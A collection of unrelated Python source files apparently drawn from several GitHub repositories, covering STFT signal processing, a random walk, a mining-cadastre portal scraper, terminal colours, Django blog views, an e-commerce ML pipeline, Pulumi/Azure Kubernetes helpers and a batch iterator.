----------
x: array_like, (n_samples) or (n_samples, n_channels)
input signal
L: int
frame size
hop: int
shift size between frames
win: array_like
the window to apply (default None)
zp_back: int
zero padding to apply at the end of the frame
zp_front: int
zero padding to apply at the beginning of the frame
Returns
-------
X: ndarray, (n_frames, n_frequencies) or (n_frames, n_frequencies, n_channels)
The STFT of x
"""
if x.ndim == 2:
channels = x.shape[1]
else:
channels = 1
the_stft = STFT(
L, hop=hop, analysis_window=win, channels=channels, precision=x.dtype
)
if zp_back > 0:
the_stft.zero_pad_back(zp_back)
if zp_front > 0:
the_stft.zero_pad_front(zp_front)
# apply transform
return the_stft.analysis(x)
# inverse STFT
def synthesis(X, L, hop, win=None, zp_back=0, zp_front=0):
"""
Convenience function for one-shot inverse STFT
Parameters
----------
X: array_like (n_frames, n_frequencies) or (n_frames, n_frequencies, n_channels)
The data
L: int
frame size
hop: int
shift size between frames
win: array_like
the window to apply (default None)
zp_back: int
zero padding to apply at the end of the frame
zp_front: int
zero padding to apply at the beginning of the frame
Returns
-------
x: ndarray, (n_samples) or (n_samples, n_channels)
The inverse STFT of X
"""
if X.ndim == 3:
channels = X.shape[2]
else:
channels = 1
the_stft = STFT(
L, hop=hop, synthesis_window=win, channels=channels, precision=X.dtype
)
if zp_back > 0:
the_stft.zero_pad_back(zp_back)
if zp_front > 0:
the_stft.zero_pad_front(zp_front)
# apply transform
return the_stft.synthesis(X)
def compute_synthesis_window(analysis_window, hop):
"""
Computes the optimal synthesis window given an analysis window
and hop (frame shift). The procedure is described in
<NAME> and <NAME>, *Signal estimation from modified short-time Fourier transform,*
IEEE Trans. Acoustics, Speech, and Signal Process.,
vol. 32, no. 2, pp. 236-243, 1984.
Parameters
----------
analysis_window: array_like
The analysis window
hop: int
The frame shift
"""
norm = np.zeros_like(analysis_window)
L = analysis_window.shape[0]
# move the window back as far as possible while still overlapping
n = 0
while n - hop > -L:
n -= hop
# now move the window and sum all the contributions
while n < L:
if n == 0:
norm += analysis_window ** 2
elif n < 0:
norm[: n + L] += analysis_window[-n - L :] ** 2
else:
norm[n:] += analysis_window[:-n] ** 2
n += hop
return analysis_window / norm
``` |
{
"source": "4bic-attic/data_viz",
"score": 4
} |
#### File: 4bic-attic/data_viz/random_walk.py
```python
from random import choice
class RandomWalk():
"""class to generate random walks."""
def __init__(self, num_points=5000):
"""Initialize attributes of a walk"""
self.num_points = num_points
#All walks start from (0, 0)
self.x_values = [0]
self.y_values = [0]
def fill_walk(self):
"""Calculate all the points in the walk"""
#keep taking steps till desired length has been reached
while len(self.x_values) < self.num_points:
#decide which direction to take and how far to go
x_direction = choice([1, -1])
x_distance = choice([0, 1, 2, 3, 4])
x_step = x_direction * x_distance
y_direction = choice([1, -1])
y_distance = choice([0, 1, 2, 3, 4])
y_step = y_direction * y_distance
#reject moves that go nowhere
if x_step == 0 and y_step == 0:
continue
#calculate the next X and Y values
next_x = self.x_values[-1] + x_step
next_y = self.y_values[-1] + y_step
self.x_values.append(next_x)
self.y_values.append(next_y)
``` |
{
"source": "4bic/scraper_Mozmbq",
"score": 2
} |
#### File: scraper_Mozmbq/src/flexicadastre_scrape.py
```python
from itertools import count
import requests
import json
import os
import re
from common import DATA_PATH
SITES = {
'NA': 'http://portals.flexicadastre.com/Namibia/',
'MZ': 'http://portals.flexicadastre.com/mozambique/en/',
'KE': 'http://map.miningcadastre.go.ke/map',
'RW': 'http://portals.flexicadastre.com/rwanda/',
'TZ': 'http://portal.mem.go.tz/map/',
'CD': 'http://portals.flexicadastre.com/drc/en/'
}
QUERY = {
'where': '1=1',
'outFields': '*',
'geometryType': 'esriGeometryPolygon',
'spatialRel': 'esriSpatialRelIntersects',
#'units': 'esriSRUnit_Meter',
'outSR': 102100, # wgs 84
'resultRecordCount': 500,
'resultOffset': 0,
'returnGeometry': 'true',
'f': 'pjson'
}
STORE_PATH = os.path.join(DATA_PATH, 'flexicadastre', 'raw')
try:
os.makedirs(STORE_PATH)
except:
pass
def scrape_layers(sess, data, token, rest_url):
res = sess.get(rest_url, params={'f': 'json', 'token': token})
print 'Scraping %s at %s' % (data['source_title'], rest_url)
for layer in res.json().get('layers'):
layer['rest_url'] = rest_url
query_url = '%s/%s/query' % (rest_url, layer['id'])
q = QUERY.copy()
q['token'] = token
layer['query_url'] = query_url
print ' -> Layer: [%(id)s] %(name)s ' % layer
for i in count(0):
q['resultOffset'] = q['resultRecordCount'] * i
res = sess.get(query_url, params=q)
page = res.json()
# print page
if 'data' not in layer:
layer['data'] = page
else:
layer['data']['features'].extend(page['features'])
if not page.get('exceededTransferLimit'):
break
data['layers'].append(layer)
# print 'Entries:', len(data['layers'])
return data
def scrape_configs():
for name, url in SITES.items():
sess = requests.Session()
res = sess.get(url)
groups = re.search(r"MainPage\.Init\('(.*)'", res.content)
text = groups.group(1)
text = text.replace("\\\\\\'", "")
text = text.replace("\\'", "")
text = text.replace('\\\\\\"', "")
text = '"%s"' % text
cfg = json.loads(json.loads(text))
token = cfg['Extras'].pop()
data = {
'source_name': name,
'source_title': cfg['Title'],
'source_url': url,
# 'rest_url': rest_url,
'layers': []
}
for service in cfg['MapServices']:
if service['MapServiceType'] == 'Features':
rest_url = service['RestUrl']
data = scrape_layers(sess, data, token, rest_url)
path = os.path.join(STORE_PATH, '%s.json' % name)
with open(path, 'wb') as fh:
json.dump(data, fh)
if __name__ == '__main__':
scrape_configs()
``` |
{
"source": "4Bos/contils",
"score": 3
} |
#### File: contils/contils/color.py
```python
import typing
from contils.raw import Raw
# reset - \x1b[0m
# black - \x1b[30m
# red - \x1b[31m
# green - \x1b[32m
# yellow - \x1b[33m
# blue - \x1b[34m
# magenta - \x1b[35m
# cyan - \x1b[36m
# light gray - \x1b[37m
# gray - \x1b[90m
# light red - \x1b[91m
# light green - \x1b[92m
# light yellow - \x1b[93m
# light blue - \x1b[94m
# light magenta - \x1b[95m
# light cyan - \x1b[96m
# white - \x1b[97m
class Color(Raw):
_raw: typing.Any
_color: str
def __init__(self, raw: typing.Any, color: str):
self._raw = raw
self._color = color
def __len__(self):
return len(str(self._raw))
def __str__(self):
return f'{self._color}{self._raw}\x1b[0m'
def __raw__(self) -> typing.Any:
return self._raw
def __format__(self, format_spec: str):
result = ('{{0:{0}}}'.format(format_spec)).format(self._raw)
return f'{self._color}{result}\x1b[0m'
pass
def black(raw: typing.Any):
return Color(raw, '\x1b[30m')
def red(raw: typing.Any):
return Color(raw, '\x1b[31m')
def green(raw: typing.Any):
return Color(raw, '\x1b[32m')
def yellow(raw: typing.Any):
return Color(raw, '\x1b[33m')
def blue(raw: typing.Any):
return Color(raw, '\x1b[34m')
def magenta(raw: typing.Any):
return Color(raw, '\x1b[35m')
def cyan(raw: typing.Any):
return Color(raw, '\x1b[36m')
def light_gray(raw: typing.Any):
return Color(raw, '\x1b[37m')
def gray(raw: typing.Any):
return Color(raw, '\x1b[90m')
def light_red(raw: typing.Any):
return Color(raw, '\x1b[91m')
def light_green(raw: typing.Any):
return Color(raw, '\x1b[92m')
def light_yellow(raw: typing.Any):
return Color(raw, '\x1b[93m')
def light_blue(raw: typing.Any):
return Color(raw, '\x1b[94m')
def light_magenta(raw: typing.Any):
return Color(raw, '\x1b[95m')
def light_cyan(raw: typing.Any):
return Color(raw, '\x1b[96m')
def white(raw: typing.Any):
return Color(raw, '\x1b[97m')
```
#### File: contils/contils/flash.py
```python
import typing
from contils.raw import Raw
class Flash:
def __init__(self):
self._max_len = 0
def print(self, msg: typing.Any):
self.clear()
self._max_len = max(self._max_len, len(str(msg.__raw__())) if isinstance(msg, Raw) else len(str(msg)))
print(f'\r{msg}', end='')
def clear(self):
print('\r' + ' ' * self._max_len + '\r', end='')
@staticmethod
def end():
print()
pass
```
#### File: contils/contils/raw.py
```python
import abc
import typing
class Raw(abc.ABC):
@abc.abstractmethod
def __raw__(self) -> typing.Any:
pass
pass
``` |
{
"source": "4-bytes/Blogify",
"score": 3
} |
#### File: blogify/posts/views.py
```python
from django.http import HttpResponse
from django.shortcuts import render, redirect
from django.contrib.auth.decorators import login_required
from .models import Post
from . import forms
# Create your views here.
def post_list(request):
posts = Post.objects.all().order_by("-date") # grabs all posts from db ordered by date
return render(request, "posts/post_list.html", {"posts": posts}) # create dic to send to template with data retrieved from db
def post_detail(request, slug):
post = Post.objects.get(slug=slug)
return render(request, 'posts/post_detail.html', {'post' : post }) # retrieves content for each post
@login_required(login_url="/accounts/login/")
def post_create(request):
if request.method == "POST": # when the submit btn is pressed
form = forms.CreatePost(request.POST, request.FILES)
if form.is_valid():
instance = form.save(commit=False)
instance.author = request.user # set the current logged in user as the post writer
instance.save()
return redirect('posts:list')
else:
form = forms.CreatePost()
return render(request, "posts/post_create.html", { 'form' : form })
@login_required(login_url="/accounts/login")
def post_own(request):
posts = Post.objects.filter(author=request.user) # filter posts by current logged in user
return render(request, "posts/post_own.html", {"posts": posts})
``` |
{
"source": "4c697361/e-commerce",
"score": 3
} |
#### File: src/data/dataframe.py
```python
import os
import sys
import pandas as pd
import numpy as np
from ast import literal_eval
from nltk.tokenize import word_tokenize
from nltk.corpus import stopwords
from nltk.stem.porter import PorterStemmer
import string
from collections import Counter
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
import src.utils.utils as ut
#nltk.download('all')
def save_df(data, safe_to):
data.to_csv(safe_to, sep=';')
del data
def read_df(load_from):
df = pd.read_csv(load_from, sep=';', header=0)
if('Unnamed: 0' in df.columns):
df.drop(['Unnamed: 0'], axis=1)
for col in ['reduced_title', 'tokenized']:#, 'cat_category', 'cat_product_category', 'cat_product_type', 'cat_product_details']:
if(col in df.columns):
df.loc[:, col] = df.loc[:, col].apply(lambda x: literal_eval(x))
return df
class preparation:
def __init__(self, clean_title):
self.clean_title = clean_title
def __text_cleaning(self, text):
"""
Tokenizing and cleaning proceedure for text data.
"""
deadlist = ['mit', 'xxl', 'xxxl', 'uvp', 'xcm', 'grs', 'grm', 'grl',
'tlg', 'xxcm', 'xcm']
transfer = {
ord('ä'): 'ae',
ord('ö'): 'oe',
ord('ü'): 'ue',
ord('ß'): 'ss'
}
# tokenize the text string
tokens = word_tokenize(text)
# convert to lower case
tokens = [w.lower() for w in tokens]
# transfer German umlauts into vowels
tokens = [w.translate(transfer) for w in tokens]
# remove punctuation and digits from each word
table = str.maketrans('', '', string.punctuation + string.digits)
stripped = [w.translate(table) for w in tokens]
# remove remaining tokens that are not alphabetic
words = [word for word in stripped if word.isalpha()]
# reduce words to their stemms
porter = PorterStemmer()
stemmed = list(set([porter.stem(word) for word in words]))
# filter out
# stop words,
# words that are contained in the deadlist,
# words that are shorter than 3 characters and
# words which are assembled only from one and
# the same identical character
stop_words = set(stopwords.words(['english', 'german']) + deadlist)
words = [w for w in stemmed if w not in stop_words
and len(w) > 2 and len(Counter(w)) > 1]
# et voilà
return words
def make_clean_sku(self, data):
data['imagename'] = data['sku'].astype(str) + '.jpg'
return data
def make_clean_title(self, data):
"""
Tokenize and stemm the title column by creating the new column
'reduced_title'.
For simplicity keep only those references which have a non-vanishing
reduced_title.
"""
if('reduced_title' not in data.columns):
data['reduced_title'] = data['title']\
.apply(lambda x: self.__text_cleaning(x))
data = data[data['reduced_title'].apply(lambda x: len(x) > 0)]
return data.reset_index(drop=True)
def make_clean_imagecontent(self, data):
"""
Keep only references to images in the DataFrame
which exist and are not empty
"""
indices = []
for idx, row in data.iterrows():
src = os.path.join(ut.dirs.original_dataset_dir,
str(row.sku)+'.jpg')
if(os.path.exists(src) is False):
indices.append(idx)
elif(os.path.isfile(src) is False):
indices.append(idx)
else:
if(os.stat(src).st_size == 0):
indices.append(idx)
else:
pass
return data.drop(data.index[indices]).reset_index(drop=True)
def make_expanded_categories(self, data):
"""
Expand the category column to enable multilabel classification
"""
if(('category' in data.columns)):
expanded_cats = data['category'].str.split(' > ')
expanded_cats = expanded_cats.apply(pd.Series)\
.rename({0: 'product_category',
1: 'product_type',
2: 'product_details'},
axis='columns')
return data.join(expanded_cats)
else:
return data
def make_keras_embeddings(self, data):
"""
Create the word embeddings used for training the NLP model
"""
delim = ','
column = 'reduced_title'
if(self.clean_title is not True):
delim = ' '
column = 'title'
if(column in data.columns):
max_len = np.max(np.array([len(x) for x in data.reduced_title]))
vocab_len = data[column].apply(pd.Series).stack().value_counts()
print('************************ max_len:', max_len)
print('************************ vocab_len:', vocab_len, ut.params.n_vocab)
tokenize = Tokenizer(num_words=ut.params.n_vocab,
char_level=False,
filters='0123456789!"#$%&()*+,-./:;<=>?@[\]^_`{|}~',
lower=True,
split=delim)
to_embed = data[column]
tokenize.fit_on_texts(to_embed)
embed_dict = pd.DataFrame.from_dict(tokenize.word_index, orient="index")
embed_dict.to_csv(os.path.join(ut.dirs.raw_dir, 'embeddings.csv'))
del embed_dict
#description = tokenize.texts_to_matrix(data[column])
embeddings = tokenize.texts_to_sequences(to_embed)
embeddings = pad_sequences(embeddings, maxlen=ut.params.n_words)
data['tokenized_title'] = embeddings.tolist()
return data
def make_clean(self, data):
data = self.make_clean_title(data)
data = self.make_clean_imagecontent(data)
data = self.make_expanded_categories(data)
data = self.make_keras_embeddings(data)
data = self.make_clean_sku(data)
data = data.dropna().reset_index(drop=True)
return data
class stat_selection:
def __init__(self, column='category', quant=None, sample_size=None):
self.column = column
self.quant = quant
self.sample_size = sample_size
def count_categories(self, data):
if(self.column in data.columns):
return pd.DataFrame(data[self.column]
.value_counts())\
.reset_index()\
.rename({'index': self.column,
self.column: 'counts'},
axis='columns')
else:
print(self.column, 'not in DataFrame columns!')
print('Select from', data.columns)
sys.exit()
def select_category_threshold(self, data):
if(self.quant is not None):
df_cats = self.count_categories(data)
cutoff = None
if(type(self.quant) is float):
cutoff = df_cats.counts.quantile(self.quant)
print('Select from', self.column, 'of the DataFrame all entries which',
'belong to the than', self.quant, 'percentile')
elif(type(self.quant) is int):
cutoff = self.quant
print('Select from', self.column, 'of the DataFrame all entries with',
'more than', cutoff, 'samples')
else:
print('Cutoff has wrong data type')
sys.exit()
if(cutoff is not None):
list_cats = df_cats[df_cats['counts'] > cutoff][self.column].tolist()
del df_cats
return data[data[self.column].isin(list_cats)].reset_index(drop=True)
else:
print('Choose a different quantile.')
sys.exit()
else:
return data.reset_index(drop=True)
def select_equalized_subsample(self, data):
if(self.sample_size is not None):
df_cats = self.count_categories(data)
df_sub = pd.DataFrame()
for idx, cat_rows in df_cats.iterrows():
if(cat_rows.counts > 1./self.sample_size):
cat = cat_rows[self.column]
df_temp = data[data[self.column] == cat]\
.sample(frac=self.sample_size,
random_state=ut.params.seed)
df_sub = pd.concat([df_sub, df_temp])
del df_temp
del df_cats
del data
return df_sub.reset_index(drop=True)
else:
return data.reset_index(drop=True)
def make_selection(self, data):
data = self.select_equalized_subsample(data)
data = self.select_category_threshold(data)
return data
def make_categorical(data):
data['cat_category'] = data['category'].astype('category').cat.codes
data['cat_product_category'] = data['product_category'].astype('category').cat.codes
data['cat_product_type'] = data['product_type'].astype('category').cat.codes
data['cat_product_details'] = data['product_details'].astype('category').cat.codes
return data
def working_df(clean_title=True, column='category', quantile=None, sample_size=None):
df_clean_dir = os.path.join(ut.dirs.raw_dir, ut.df_names.cleaned_df)
df_return = None
if(os.path.exists(df_clean_dir) is False or os.stat(df_clean_dir).st_size == 0):
df_dir = os.path.join(ut.dirs.raw_dir, ut.df_names.original_df)
df = read_df(df_dir).dropna().reset_index(drop=True)
df_cleaned = preparation(clean_title).make_clean(df)
save_df(df_cleaned, df_clean_dir)
del df
else:
df_cleaned = read_df(df_clean_dir).dropna()
df_return = stat_selection(column, quantile, sample_size).make_selection(df_cleaned)
del df_cleaned
return make_categorical(df_return)
```
#### File: src/models/train_model.py
```python
import os
import click
import logging
from pathlib import Path
from dotenv import find_dotenv, load_dotenv
from keras.callbacks import ModelCheckpoint, EarlyStopping
import src.utils.utils as ut
import src.utils.model_utils as mu
import src.models.model as md
import src.models.data_generator as dg
import src.data.dataframe as dat
def train(classmode, modelmode, batch_size, epochs, learning_rate):
train = dat.read_df(os.path.join(ut.dirs.processed_dir, ut.df_names.train_df))
nclasses = mu.ref_n_classes(classmode)
valid = dat.read_df(os.path.join(ut.dirs.processed_dir, ut.df_names.valid_df))
traindata = dg.DataSequence(train,
ut.dirs.train_dir,
batch_size=batch_size,
classmode=classmode,
modelmode=modelmode)
validdata = dg.DataSequence(valid,
ut.dirs.validation_dir,
batch_size=batch_size,
classmode=classmode,
modelmode=modelmode)
model = md.custom(classmode, modelmode, nclasses).make_compiled_model(learning_rate)
model.summary()
save_model_to = os.path.join(ut.dirs.model_dir, classmode + '_' + modelmode + '.h5')
Checkpoint = ModelCheckpoint(save_model_to,
monitor='val_loss',
verbose=0,
save_best_only=False,
save_weights_only=False,
mode='auto',
period=1)
Earlystop = EarlyStopping(monitor='val_loss',
min_delta=0,
patience=5,
verbose=0,
mode='auto',
baseline=None)
model.fit_generator(generator=traindata,
steps_per_epoch=len(train)//batch_size,
validation_data=validdata,
validation_steps=len(valid)//batch_size,
epochs=epochs,
callbacks=[mu.TrainValTensorBoard(write_graph=False),
Checkpoint],
#verbose=1,
use_multiprocessing=False,
workers=1)
@click.command()
@click.option('--classmode', type=str, default=ut.params.classmode,
help='choose a classmode:\n\
multilabel, multiclass\n\
(default: multilabel)')
@click.option('--modelmode', type=str, default=ut.params.modelmode,
help='choose a modelmode:\n\
image, text, combined\n\
(default: combined)')
@click.option('--ep', type=float, default=ut.params.epochs,
help='number of epochs (default: {})'.
format(ut.params.epochs))
@click.option('--lr', type=float, default=ut.params.learning_rate,
help='learning rate (default: {})'.
format(ut.params.learning_rate))
@click.option('--bs', type=int, default=ut.params.batch_size,
help='batch size (default: {})'.
format(ut.params.batch_size))
def main(classmode, modelmode, bs, ep, lr):
classmode, modelmode = ut.check_modes(classmode, modelmode)
train(classmode, modelmode, bs, ep, lr)
if __name__ == '__main__':
log_fmt = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
logging.basicConfig(level=logging.INFO, format=log_fmt)
project_dir = Path(__file__).resolve().parents[2]
load_dotenv(find_dotenv())
main()
``` |
{
"source": "4c74356b41/IaC",
"score": 2
} |
#### File: wip/pulumi/helpers.py
```python
import os
import re
import secrets
import string
import pulumi
from pulumi import ResourceOptions
from pulumi_kubernetes.apps.v1 import Deployment
from pulumi_kubernetes.core.v1 import Service
from azure.keyvault import KeyVaultClient, KeyVaultAuthentication, KeyVaultId
from azure.common.credentials import ServicePrincipalCredentials
def normalize_name(name):
regex = re.compile('[^a-zA-Z0-9]')
replaced = regex.sub('', name)
normalized = replaced[:23] if len(replaced) > 23 else replaced
return normalized
def _get_kvclient():
def auth_callback(server, resource, scope):
credentials = ServicePrincipalCredentials(
client_id = os.getenv('ARM_CLIENT_ID'),
secret = os.getenv('ARM_CLIENT_SECRET'),
tenant = os.getenv('ARM_TENANT_ID'),
resource = "https://vault.azure.net"
)
token = credentials.token
return token['token_type'], token['access_token']
kv_client = KeyVaultClient(KeyVaultAuthentication(auth_callback))
return kv_client
def get_kv_secret(name):
kv_client = _get_kvclient()
secret = kv_client.get_secret("https://placeholder.vault.azure.net/", name, KeyVaultId.version_none).value
return secret
def _get_password():
alphabet = string.ascii_letters + string.digits
password = ''.join(secrets.choice(alphabet) for i in range(20))
return password
config = pulumi.Config('aks')
PREFIX = pulumi.get_stack()
PASSWORD = config.get('password') or _get_password()
SSHKEY = config.get('sshkey') or 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCxinIAIDDCradZPAgX5GzBLv00u4rigOLUbU00E44FrfMTqu5wXiejJ4ycSb1bI+//ZNgaB2UYRbPL7A9OUKY+K4sX5O84Q6DPMjo/90IANHVTLf3xTaSc7hpvXO<KEY>'
LOCATION = config.get('location') or 'westeurope'
NAMESPACE = config.get('namespace') or 'flux'
args_flux = [
"--ssh-keygen-dir=/var/fluxd/keygen",
"--k8s-secret-name=flux-ssh",
"--memcached-hostname=memcached",
"--memcached-service=",
"--git-url=<EMAIL>:v3/xxxxxx",
"--git-branch=master",
"--git-path=flux/cluster-setup,flux/{}".format(PREFIX),
"--git-user=<NAME>",
"--git-email=<EMAIL>",
"--git-set-author=false",
"--git-poll-interval=5m",
"--git-label={}".format(PREFIX),
"--git-timeout=20s",
"--sync-interval=5m",
"--git-ci-skip=false",
"--registry-exclude-image=*",
"--registry-poll-interval=5m",
"--registry-rps=200",
"--registry-burst=125",
"--registry-trace=false"
]
args_memcached = ["-m 64","-p 11211","-I 1m"]
volumeMounts_flux = [
{
"name": "kubedir",
"mountPath": "/root/.kubectl"
},
{
"name": "git-key",
"mountPath": "/etc/fluxd/ssh",
"readOnly": True
},
{
"name": "git-keygen",
"mountPath": "/var/fluxd/keygen"
}
]
volumes_flux = [
{
"name": "kubedir",
"configmap": {
"name": "flux-configmap"
}
},
{
"name": "git-key",
"secret": {
"secretName": "<KEY>",
"defaultMode": 0o400 # has to be in octal
}
},
{
"name": "git-keygen",
"emptyDir": {
"medium": "Memory"
}
}
]
def _gen_service(name, ports, custom_provider, dependencies=[], service_type="ClusterIP"):
ports = [{"port": port, "target_port": port,
"name": str(port)} for port in ports]
labels = {
"app": name,
"purpose": "flux"
}
Service(name,
metadata={
"name": name,
"labels": labels,
"namespace": NAMESPACE
},
spec={
"ports": ports,
"selector": labels,
"type": service_type,
"sessionAffinity": "ClientIP"
},
__opts__=ResourceOptions(
provider=custom_provider, depends_on=dependencies)
)
def _gen_deployment(name, ports, image, custom_provider, serviceAccount, args=[], dependencies=[],
replicas=1, resources={}, env={}, volumes=[], volume_mounts=[]):
keys = ['container_port']
ports = [dict.fromkeys(keys, port) for port in ports]
labels = {
"app": name,
"purpose": "flux"
}
container = {
"name": name,
"image": image,
"imagePullPolicy": "Always",
"resources": resources,
"ports": ports,
"args": args,
"env": [
{
"name": "KUBECONFIG",
"value": "/root/.kubectl/config"
}
],
"volumeMounts": volume_mounts
}
Deployment(name,
metadata={
"name": name,
"labels": labels,
"namespace": NAMESPACE
},
spec={
"selector": {
"match_labels": labels
},
"replicas": replicas,
"template": {
"metadata": {
"labels": labels
},
"spec": {
"containers": [
container
],
"serviceAccount": serviceAccount,
"volumes": volumes
}
}
},
__opts__=ResourceOptions(
provider=custom_provider, depends_on=dependencies)
)
def gen_application(name, ports, image, customProvider, dependencies=[], serviceAccount="default", volumes=False, volumeMounts=False):
args = globals()["args_{}".format(name)]
if volumes:
volumes = globals()["volumes_{}".format(name)]
else:
volumes = []
if volumeMounts:
volumeMounts = globals()["volumeMounts_{}".format(name)]
else:
volumeMounts = []
_gen_service(name, ports, customProvider)
_gen_deployment(name, ports, image, customProvider, serviceAccount, args=args, dependencies=dependencies, volumes=volumes, volume_mounts=volumeMounts)
```
#### File: wip/pulumi/samples.py
```python
async def get_aks_credentials():
result = await get_kubernetes_cluster(name=gen_name('aks'),
resource_group_name=gen_name('rg')
)
return result.kube_config_raw
#__main__.py
import asyncio
k8s = Provider("app_provider",
kubeconfig=get_aks_credentials(),
namespace=BRANCH)
# забрать что-то далеееко
# helpers.py
async def create_sql_database_from_existing(sql_server):
sql_client = client_factory('SqlManagementClient')
await sql_server.name.apply(lambda name: sql_client.databases.create_or_update(
gen_name(BRANCH),
name, # <pulumi.Output.outputs at 0x23463y5h3>
'TslTest',
{
'location': LOCATION,
'create_mode': 'Copy',
'sourceDatabaseId': DBID
}
)
)
#__main__.py
import asyncio
sql_server = SqlServer(
"sql",
name=resource_name,
administrator_login="rootilo",
administrator_login_password="!<PASSWORD>",
location=rg.location,
resource_group_name=rg.name,
version="12.0"
)
if not pulumi.runtime.is_dry_run():
asyncio.ensure_future(
create_sql_database_from_existing(sql_server))
``` |
{
"source": "4castRenewables/climetlab-plugin-a6",
"score": 3
} |
#### File: notebooks/utils/plot.py
```python
import matplotlib.pyplot as plt
import numpy as np
def plot_forecast_and_real_production_data(
indexes: np.ndarray,
forecast: np.ndarray,
real: np.ndarray,
) -> None:
"""Plot the forecast and real production data with residuals.
Parameters
----------
indexes : np.ndarray
Indexes of the timeseries.
forecast : np.ndarray
Forecasted production.
real : np.ndarray
Real production.
"""
fig, axs = plt.subplots(
nrows=2,
ncols=1,
figsize=(12, 8),
sharex=True,
gridspec_kw={"height_ratios": [0.8, 0.2]},
)
fig.subplots_adjust(hspace=0)
axs[0].set_title(f"Power production forecast")
axs[0].plot(indexes, forecast, label="forecast")
axs[0].plot(indexes, real, label="real")
residuals = (forecast - real) / real
axs[1].scatter(indexes, residuals, color="black")
for ax in axs:
ax.grid(True)
axs[1].set_xlabel("Time")
axs[0].set_ylabel("Power production [kW]")
axs[1].set_ylabel("Residuals")
axs[0].set_xlim(min(indexes), max(indexes))
axs[0].set_ylim(0, 1.1 * max(max(forecast), max(real)))
axs[1].set_ylim(1.5 * min(residuals), 1.2 * max(residuals))
axs[0].legend()
plt.show()
``` |
{
"source": "4Catalyzer/dl-papers",
"score": 3
} |
#### File: common/data/batch_iterator.py
```python
import sys
import threading
from tqdm import tqdm
import numpy as np
import pandas as pd
import six
from six.moves.queue import Queue
from ..utils import if_none
__all__ = ('BatchIterator',)
# -----------------------------------------------------------------------------
DONE = object()
# -----------------------------------------------------------------------------
class BufferedIterator(six.Iterator):
def __init__(self, source, buffer_size=2):
assert buffer_size >= 2, "minimum buffer size is 2"
# The effective buffer size is one larger, because the generation
# process will generate one extra element and block until there is room
# in the buffer.
self.buffer = Queue(maxsize=buffer_size - 1)
def populate_buffer():
try:
for item in source:
self.buffer.put((None, item))
except:
self.buffer.put((sys.exc_info(), None))
else:
self.buffer.put(DONE)
thread = threading.Thread(target=populate_buffer)
thread.daemon = True
thread.start()
def __iter__(self):
return self
def __next__(self):
value = self.buffer.get()
if value is DONE:
raise StopIteration()
exc_info, data = value
if exc_info:
six.reraise(*exc_info)
return data
# -----------------------------------------------------------------------------
class BatchIterator(object):
def __init__(
self,
batch_size,
training_epoch_size=None,
no_stub_batch=False,
shuffle=None,
seed=None,
buffer_size=2,
):
self.batch_size = batch_size
self.training_epoch_size = training_epoch_size
self.no_stub_batch = no_stub_batch
self.shuffle = shuffle
if seed is not None:
self.random = np.random.RandomState(seed)
else:
self.random = np.random
self.buffer_size = buffer_size
def __call__(self, data, *args, **kwargs):
if if_none(self.shuffle, kwargs.get('training', False)):
shuffled_data = self.shuffle_data(data, *args)
if args:
data = shuffled_data[0]
args = shuffled_data[1:]
else:
data = shuffled_data
if self.training_epoch_size is not None:
data = data[:self.training_epoch_size]
args = tuple(
arg[:self.training_epoch_size] if arg is not None else arg
for arg in args,
)
batches, epoch_size, batch_size = self.create_batches(
data, *args, **kwargs
)
if self.buffer_size:
batches = BufferedIterator(batches, buffer_size=self.buffer_size)
# Don't wrap the batches with tqdm until after buffering, to avoid
# displaying a progress bar whilst eagerly generating batches.
return self.tqdm(batches, epoch_size, batch_size)
def shuffle_data(self, *args):
state = self.random.get_state()
shuffled_data = tuple(
self.shuffle_array(array, state) for array in args,
)
if len(shuffled_data) == 1:
return shuffled_data[0]
else:
return shuffled_data
def shuffle_array(self, array, state):
if array is None:
return None
self.random.set_state(state)
if isinstance(array, pd.DataFrame):
# Can't use sample because it's not consistent behavior for numpy
# arrays.
return array.iloc[self.random.permutation(len(array))]
elif hasattr(array, 'shuffle'):
# Handle e.g. DeferredArray, which has custom logic.
return array.permutation(self.random)
else:
return self.random.permutation(array)
def create_batches(self, data, *args, **kwargs):
batch_size = self.batch_size
if self.no_stub_batch:
epoch_size = len(data) // batch_size * batch_size
else:
epoch_size = len(data)
def batches():
for i in range(0, epoch_size, batch_size):
batch_slice = slice(i, i + batch_size)
x_batch = data[batch_slice]
args_batch = tuple(
arg[batch_slice] if arg is not None else arg
for arg in args,
)
yield self.transform(x_batch, *args_batch, **kwargs)
return batches(), epoch_size, batch_size
def transform(self, data, *args):
return (data,) + args if args else data
def tqdm(self, batches, epoch_size, batch_size):
with tqdm(
total=epoch_size, leave=False, disable=None, unit='ex',
) as pbar:
for batch in batches:
yield batch
pbar.update(batch_size)
```
#### File: common/layers/normalization.py
```python
import tensorflow as tf
from .utils import get_axis_internal_data_format
__all__ = ('batch_normalization',)
# -----------------------------------------------------------------------------
# This should be a partial application of tf.layers.batch_normalization, but
# only tf.contrib.layers.batch_norm supports the fused option.
def batch_normalization(
inputs,
axis=-1,
momentum=0.9,
epsilon=1e-5,
center=True,
scale=True,
training=False,
name=None,
):
return tf.contrib.layers.batch_norm(
inputs,
decay=momentum,
center=center,
scale=scale,
epsilon=epsilon,
is_training=training,
fused=True,
data_format=get_axis_internal_data_format(axis),
scope=name,
)
```
#### File: common/layers/resnet.py
```python
import functools
import tensorflow as tf
from .normalization import batch_normalization
from .utils import get_channel_axis, with_variable_scope
# -----------------------------------------------------------------------------
conv2d = functools.partial(
tf.layers.conv2d,
padding='same',
use_bias=False,
)
# -----------------------------------------------------------------------------
@with_variable_scope
def bn_relu_conv(
net,
filters,
kernel_size,
bn_momentum=0.9,
dropout_rate=0,
data_format='channels_last',
training=False,
**kwargs
):
net = batch_normalization(
net,
axis=get_channel_axis(data_format),
momentum=bn_momentum,
training=training,
)
net = tf.nn.relu(net)
if dropout_rate != 0:
net = tf.layers.dropout(net, rate=dropout_rate, training=training)
net = conv2d(
net,
filters,
kernel_size,
data_format=data_format,
**kwargs
)
return net
@with_variable_scope
def scalar_gating(
net,
activation=tf.nn.relu,
k_initializer=tf.ones_initializer(),
k_regularizer=None,
k_regularizable=False,
):
# Represent this with shape (1,) instead of as a scalar to get proper
# parameter count from tfprof.
k = tf.get_variable(
'k',
(1,),
initializer=k_initializer,
regularizer=k_regularizer,
trainable=True,
)
# Per the paper, we may specifically not want to regularize k.
k.regularizable = k_regularizable
return activation(k) * net
@with_variable_scope
def residual_group(
net,
